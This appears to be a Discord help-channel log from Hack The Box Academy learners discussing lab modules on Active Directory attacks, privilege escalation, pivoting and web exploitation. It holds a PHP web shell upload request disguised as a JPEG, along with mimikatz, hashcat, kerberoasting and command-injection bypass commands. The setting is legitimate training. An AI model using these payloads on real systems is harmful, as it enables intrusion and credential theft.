My problem is I had to resort to a writeup specific to a hackthebox machine, and couldn't just figure it out using the documentation for the tool itself.
The docs for the tool didn't even cover using it in the context of an SQL shell
As per section
When I ran this with starting directory C, it gave me a lot of files that contain the word 'password' and I found a few but none of them was the answer
so asking
I was able to transfer the files no problem obviously, but the workflow just wasn't there without using extra help.
Just a bummer I had to resort to that.
"We find that we have SeImpersonatePrivelege, which can be leveraged in combination with a tool such as JuicyPotato, PrintSpoofer, or RoguePotato"
literally in the text
I know, there just wasn't anything else on how to use PrintSpoofer
yep because the search looks for specifically 'password' string
Ok š
hint me the string
sidenote: love your use of drawings to convey how you feel
idk the string lmao i haven't done it
but likely you're gonna wanna just first try manually looking around for files
Thank kooo...!!!
Get-ChildItem? I think is the thing, but i think powershell has grep aliased to it
and selectstring
i love that Microsoft was just like "Let's alias all these linux commands to Powershell native commands by default"
pretty much yeah
also gotta love the CamelCasing
isn't that: camelCase
I'm actually a fan of C naming conventions, looks better compared to python's snake case
Nope CamelCase separates words by the First Letter Of Each Word Capitalized
https://en.wikipedia.org/wiki/Camel_case you're thinking of title case
Kebab case is a way of writing phrases without spaces, where spaces are replaced with hyphens -, and the words are typically all lower case. The name comes from the similarity of the words to meat on a kebab skewer. It's often stylized as "kebab-case" to remind the reader of its appearance.
and now i know of kebab-case
also according to wiki, the first word can start either lowercase or capitalized, GG
for programming naming convention it's usually always camelCase
What module/section went over the "lsadump::lsa" command in mimikatz?
likely password attacks
"lsadump::lsa /inject" actually
I have the modules saved as .md files and I have checked AD, Password, and Common Services, can't seem to find it
Is there a similar command that's covered?
It's to get an admin NTLM hash.
I guess at this point what I need to ask is, what other tool would have provided the same output, since lsadump::lsa /inject isn't covered explicitly in any module?
Is this similar to an lsass dump in powershell and then analysis with pypykatz?!
At a glance that's what it seems like.
Has anyone done the Windows Attack & Defense module?
@fathom pendant @next bronze
Solved after thinking out of the box..!
Yes findstr sometimes don't show files..!!!
Trying to use a pass the hash on AD Skills Assessment 2 but getting an error
why is powerview throwing this error?
wrong hash
use NT hash only
hello guys, is anyone doing the AD module? I just want to check because I cannot ping; I want to check if there is something wrong. Please, can anyone help me?
sometimes machines can't be pinged; but in any case - are you connected to the vpn? do you only have 1 tunX interface (tun0)?
in general though you should ask technical support questions to support (green bubble on the website)
I have tun0 but I can't reach the subnet they gave me 172.x.x.x/23
I can't do fping either
ah
well; that's because that's an internal network
you need to pivot through the spawned target to get to it
the vpn only grants you access to the 10.129.x.x network
but I am on the machine they gave me at the start; do I need to pivot from there?
I did run the spawn machine 10.10.x.x
10.10.x.x is generally your tun0 IP
i'm talking about the big green button "Click Here To Spawn Target"
not "Start Instance"
"Start Instance" starts the in-browser pwnbox
sorry for confusing things, but I have just returned to that module after stopping for a long time; some of it I have finished, I am just recapping from 0
this is what you click to spawn a target system to pivot through
now I am in the section Initial Enumeration of the Domain; they show me screenshots and commands, and Start Machine is not the target, it's the machine that I use. There I can't use those commands, right? I need to spawn the target
hi guys, does anyone know why every time I try to ssh it gets stuck like before the password input? it never finishes "loading". I've tried to reset the IP, I've changed VPN server and still the same
when they say "start the machine" they mean the target machine
message support on the site
okay
start instance*
sorry this is the correct word
this button spawns the in-browser pwnbox
which is NOT the target system, and does NOT have access to the internal target network
so maybe this is just an introduction here in this section Initial Enumeration of the Domain
Thank u so much @fathom pendant, ur amazing
I will check it out
i'm now confused as to wtf you're on
do NOT run the pwnbox if you're using your own vm and vpn
running both the pwnbox and your own vm/vpn will cause issues
the ONLY button you need is the "Click here to spawn the target system!" which gives you a foothold to start with
I was just double checking if I have any configuration wrong on my kali box, that's why I ran the instance
thank u so much
it's not an issue with your kali box
it's literally the fact that you CANNOT access the 172.16.x.x network. period
without first connecting/setting up a pivot through the foothold target
i understand thank u so much
i believe this target/foothold is a linux machine
i will check it out and let u know thank u
Obtain credentials for a user who has GenericAll rights over the Domain Admins group. What's this user's account name?
I know I can do it with bloodhound but I wanna know is there any other way to do it
Hi, I'm doing the IMAP/POP3 footprinting module, I'm quite stuck trying to find the admin email address. I connected via openssl to the server and tried to LIST the content of INBOX or the other mailboxes but without any luck. May I ask you for advice or to point me in the right direction?
if you read the email you can see who sent the mail
but first you'd need to log in as a user
you can't list mailboxes without first logging in
that was my idea and I did the login, at least I guess. I'll try to redo the procedure, thank you
you can read dacl
also with imap; you NEED to have a prefix
{something here} <Command> <args>
On Windows Priv Esc -> Weak Permissions:
was able to elevate privilege and got to the flag by signing out/in. However could only reach the flag in the GUI, not over CMD (got permission denied). Any idea how one would reach the flag in cmd?
run cmd as admin?
the module or section of ad enumeration
tried using runas for a new session?
I don't think it's covered, you'll need to do your own research https://www.thehacker.recipes/ad/movement/dacl
did you also use bloodhound for this task?
Bloodhound would be able to show you that information
yep, don't remember what I used though, it's been a while
Hello
Understanding Log Sources & Investigating with Splunk
Intrusion Detection With Splunk (Real-world Scenario)
Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all data any suspicious loads of clr.dll that could indicate a C# injection/execute-assembly attack. Then, again through SPL searches, find if any of the suspicious processes that were returned in the first place were used to temporarily execute code. Enter its name as your answer. Answer format: _.exe
actually I am struggling with this question; can someone DM me to give me some hint?
The question says that you should filter for the clr.dll.
Think about which property must also be fulfilled for the call to be suspicious.
Hackthebox is pretty crazy, for me it's way more interesting than tryhackme
hack the box can be a starting position for beginners, but tryhackme is the easier way to start, while htb is harder if you're just starting in cybersecurity
You need to challenge yourself sometimes to learn something better
you also should not throw yourself in the deep end
Stuck on:
WINDOWS PRIVILEGE ESCALATION: Other Files
Question:
Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system.
Tried to find it that way but this is not the answer..!!
Can anyone show me the correct way to solve this?
It's not so hard for new guys that they will be so bad with it
I mean, I tried it and it's not that hard by far
ikr
which rank are you in the labs
I mean I just started yesterday
put in quotes exactly the password you submit
yeah
put in quotes the password and put it here in discord
so i can see if you make any mistakes
Please don't advise such stuff
wdym
that's clearly the password
it's probably a problem with what he inputs on the website
It definitely is a password, but not the expected one
fr?
I used both ' and " but not accepting the answer..
Ohh man.. !
it's not the right password
I caused such big confusion to everyone here just trying to help
I wanna apologize for that
no problem
it happens..!!
there are 2 people telling me it's not the right password, so I guess u gotta find the right one
I gotcha..!!
mb lmao didn't scroll down
SOLVED..!!!
Module: Information Gathering - Web Edition
Section Active Infrastructure Identification
Question: Which CMS is used on app.inlanefreight.local? (Format: word)
the solution i am trying to use is
whatweb -a3 app.inlanefreight.local or
whatweb -a3 http://app.inlanefreight.local
getting Error Opening:....
please guide me if i am doing something wrong
what does whatweb do ?
Whatweb recognizes web technologies, including content management systems (CMS), blogging platforms, statistic/analytics packages, JavaScript libraries, web servers, and embedded devices
can this URL point to an IP?
I tried but I'm getting the same result
and did you do manual inspection first?
tried with curl but no luck
can you ping it ?
by ip yes, with name no
have you added it to your /etc/hosts?
no
it's almost as if it's brainless
tbh that's basic knowledge
yk...
Module : Active & Directory Enumeration/Attacks
Section : LLMNR Poisoning with Linux
Question : Unable to crack the hash using the specific command
Command used : hashcat -m 5600 hash.txt /usr/share/wordlist/rockyou.txt
hash[.]txt file content
copy pasted it in the Responder Result
from the 3 orange lines in the hashcat output I'd say it thinks it has 4 hashes
make sure you remove the newlines at the end of each line
I'll try thanks
This is the result by removing the newlines, my copy paste is weird lol might be skill issue. Pasted it using nano
used --show and I found the password, but the output from the module is different from what I did
is the output supposed to be the same? sometimes they use a slightly different environment to test you
Not really sure about that but I just did the same command in the module tho. But I was expecting this one, not really a big problem as long as I have the result.
that one looks to be for the user forend, yours is for backupagent
results could differ depending on the user's environment?
I just think you were in a different lab than the explanation in the section. You were supposed to intercept backupagent, they showed you how to intercept another user
Just figured out that I need to use a Windows exploit on a machine; I used another exploit before to get the Salt+Key from it (sadly it doesn't seem to be useful atm) ^^
Can anyone help me with the command injection module?
hello guys what is the problem in file upload module need help
What problem ?
Stuck on
WINDOWS PRIVILEGE ESCALATION: Further Credential Theft
Question:
Using the techniques covered in this section, retrieve the sa password for the SQL01.inlanefreight.local user account.
I have tried this but something seems to be going wrong..!
This password is not accepted..
Really getting tired of this cred hunting
isn't the password hashed?
Already getting mad with this module..!
The closer I get to finishing it, the longer each section gets
CROSS-SITE SCRIPTING (XSS) --> skill assessment, whenever i load the rhost, there is nothing on the website, page has no source. Is this correct or is there something wrong?
In what format bro..
My mind is not working anymore..
Please tell me
I have no idea, use an online encryption identifier
dont do stuff manually
okay..
literally gave you the solution...
then just decrypt it with john or hashcat
depending on whatever it is
Few reboots and VM reboot did the job.
@remote latch that's my main account and I'm the alt; is there a way to link 2 discord accounts to 1 htb labs account?
Failed to find the format but @rustic sage found it with LaZagne..
noted..!
Although solved the question but....
Anyone here 'cryptographic master' reveal the format with which it has been hashed?
GetUserSPNs.py -dc-ip 172.16.5.5 INLANEFREIGHT.LOCAL/forend <--- where does this user come from ?
We got that from LLMNR poisoning, after using responder to capture the hashes
it is encrypted, just that lazagne decrypts it automatically
i used pwnbox till today
forend's hash?
yes please
okay lemme check.
that's not even the right solution..
as you say boss
already served , thx š
Guys I have a doubt: is the bug hunter program in htb good for learning and starting to hunt?
Why are you in doubt?
Becoz I never did the academy! I need to know if the course is relevant
It's good to get a start
Well, for sure it is relevant, even if it just gives you insight into the most used techniques. The hard part, if you ever are going to become a bug bounty hunter, is finding your own niche and being successful in it. It is a field which is hard to get your feet into either way.
And basic bounties
Understood!
Some bounties are just "I bothered to look"
Before we get off-topic of the channel, there is the #cwes for discussion of the cert btw
Other channels can be found by following instructions in #welcome
like everything in the technology area, right? We always need to delve deeper into topics, etc.
Thx guys I will try the BH course there
Nah, this Active Directory Enumeration and Attacks skills assessment 2 is killing me. I have a list of users but I can't get the shell. I have a user and a valid password, but can't use it for anything.
Nmap scan looks like this:
```
Not shown: 989 closed tcp ports (conn-refused)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain?
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-02-16 14:43:10Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: INLANEFREIGHT.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
```
Question: Submit the contents of the C:\flag.txt file on MS01.
wait a bit, catching up... ok probably 1-2 days
Try Smarter
Hey, I'm working through https://academy.hackthebox.com/module/116/section/1171 and I'm stuck at the part where I need to get the NTLM hash to use the RDP 'pass the hash' method to connect as Administrator. Anyone know how I can dump the NTLM hashes?
Got the answer?
I must say this one in particular is really harder than the rest
wait let me check
i've tried kerberoasting, as-rep roasting, password spraying, psexec
cool down
please do not spoil, I wanna do it too in a few
What's in the text file from question 1?
Holy shit I'm fucking dead, thank you
but you can mask it
would love some help with Skills Assessment - File Upload Attacks
https://academy.hackthebox.com/module/136/section/1310
POST /contact/upload.php HTTP/1.1
Host: 83.136.251.235:57915
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryyrV7KO0BoCBuDbTL
Content-Length: 225
------WebKitFormBoundaryyrV7KO0BoCBuDbTL
Content-Disposition: form-data; name="uploadFile"; filename="shell.jpeg"
Content-Type: image/jpeg
<?php system($_REQUEST['cmd']); ?>
------WebKitFormBoundaryyrV7KO0BoCBuDbTL--
even if I put a valid image I get "Only images are allowed" in the response; am I doing something wrong?
Having an issue with the RDP and SOCKS Tunneling with SocksOverRDP section. When I try to remote to the final machine I'm getting the following error. I've reset multiple times and keep getting the same error. Any idea what I'm doing wrong?
I occasionally get to log in, then get the following (yes, I've changed connection to modem)
CROSS-SITE SCRIPTING (XSS) --> Phishing --> document.getElementById('urlform').remove(); is the given example to deface parts of a website but this method does not work. It only seems to add the remove cmd as in plain text on the website.
regsvr32.exe SocksOverRDP-Plugin.dll
And run cmd or powershell as Administrator
I've done that and have it running
Still this issue persists?
My issue is trying to remote to the final machine 172.16.6.155. I can get to the first machine and run the exe no problem, go back to the main machine and check netstat -ano and see the connection. I get Proxifier loaded and it shows a connection to the correct machine in it. But I can't fully establish the connection to the last machine
Did this?
yep ****
This section is just touchy at times
I can occasionally get the connection, then it just crashes
As far as I remember this section keeps giving errors.
I tried after a few hours along with resets and DONE
Are you using the tcp vpn?
udp
Take a break few or try other sections
Later try this one
TCP
Switch to the tcp, see if that makes a difference
will do
I'm working on command injection (blacklist character bypass), can anyone help me find the payload?
what you want to do?
you cannot use / right?
No / is {$PATH:0:1}
maybe I guess change your payload into base64 and then run it
I'll try thanks!
I am doing the subdomain question in the ffuf module and I am completely clueless; it says that I have to write the complete subdomain name of the "inlanefreight.com" site but I do not know why it is not working
ok done for today
Why so many {IFS} tags?
And if I put IFS after the path I do get output
Yes please!
you'll figure it out
I used the ffuf command and I just found 3 subdomains, but when I write them into the site it says that I am wrong
anyone else having VPN issues atm? pwnbox working, however on the VM I can't connect to the VPN
No trouble here, Europe region.
Well, TCP connection helped a bit, but got here and it just freezes
is there a good tutorial somewhere on how to make a VM work with hack the box?
if I wanted to after subscription for example
and if I want to use kali?
then do the same, but just with kali iso
Well, progress, ish lmao. Any other suggestions to make it more stable?
use Remmina
https://remmina.org/
Remmina – X2Go, RDP, SSH, SPICE, VNC, and X2Go protocol remote desktop client.
xfree works flawlessly, rdp is laggy, I had to reconnect with rdp 5-10 times
to clarify, this is an rdp within an rdp, for the lab lol. I can rdp to the foothold fine
pivoting ?
yes, it's trying the RDP and SOCKS Tunneling with SocksOverRDP section. It's set up correctly but trying to rdp to the second machine refuses to get a stable connection. It just loads slow as hell till it freezes/errors
this part was a pita,
okay I have it done, after this I should install and use openvpn from hackthebox?
any advice on how you finally got it? found a suggestion to change to socks4 and check every option under experience but still no luck
it should be already installed in Kali
just download the ovpn file
ovpn ?
why is it like this in pwnbox?
neo4j running ?
skill or "just" module ?
just the module
I did not start it, I guess. Do you know the creds?
academy-regular.ovpn
start neo4j first
i followed the instructions on the website .. but it took a bit of time to work
sadness
wait till you get to icmp š
great, and is there any difference between academy 1 and 2? and UDP 1337
vs TCP 443
Can someone DM regarding Assembly Language - Skill assessment task 2?
"Optimize 'flag.s' for shellcoding and get it under 50 bytes, then send the shellcode to get the flag. (Feel free to find/create a custom shellcode)"
I have the code optimized by using the lowest registers and removed the exit call, and connected to the server, but it keeps failing and I don't know why
US or EU denotes the region, 1 or 2 denotes the server, TCP or UDP denotes the protocol
what is the password for bloodhound? in the doc it says neo4j:BloodHound
I started neo4j
the default creds are not working
yes I saw, but what are the differences between these servers or protocols? is it better to choose server 1 or 2, or does it even matter?
try neo4j/neo4j
it worked
TCP uses TCP = slower but more stable
UDP uses UDP = faster
1 or 2 does not matter. If you have problems on 1, switch to 2 and vice versa.
hi folks, I'm currently doing the Shells & Payloads skills assessment. I managed to finish the section with the metasploit exploit, but I wanted to try to do the manual exploit. I've managed to get the nishang webshell but I'm unsure where to go from there. Any hints?
thanks
it's been 5 minutes like this; is this supposed to take this much time? because previous targets imported really quickly
it depends on the BH version
does the htb bloodhound module use the legacy or the community one?
I guess I gotta try that on my local
Hey fellas! I got a little bit stuck on logrotate in the htb academy Linux Privilege Escalation
can someone please help?
Hello, can someone give me hints for Intro to whitebox pentesting skills assessment? I have located a possible injection point, but I just can't get a working payload. You can DM me, and I can provide more information.
You gotta make sure that your sharphound and bloodhound versions align. The latest sharphound does not work with older bloodhound versions. Might want to try sharphound 1.1.1
I've figured this out now. The reason the laudanum shell wasn't working was because of AV. thanks
Guys, does it mean someone used my reflink and bought sub?
Hey! I can't find what logfile to rotate for privilege escalation. Can someone please help me?
Always check your || userfolder ||
yeah i did it with access.log and i granted myself ncat the same priv
it was nice
can you please give me another hint?
Take another look at the section.
You are on the right track, but you have to let Logrotate do the work. Otherwise you cannot increase your rights.
alright thank you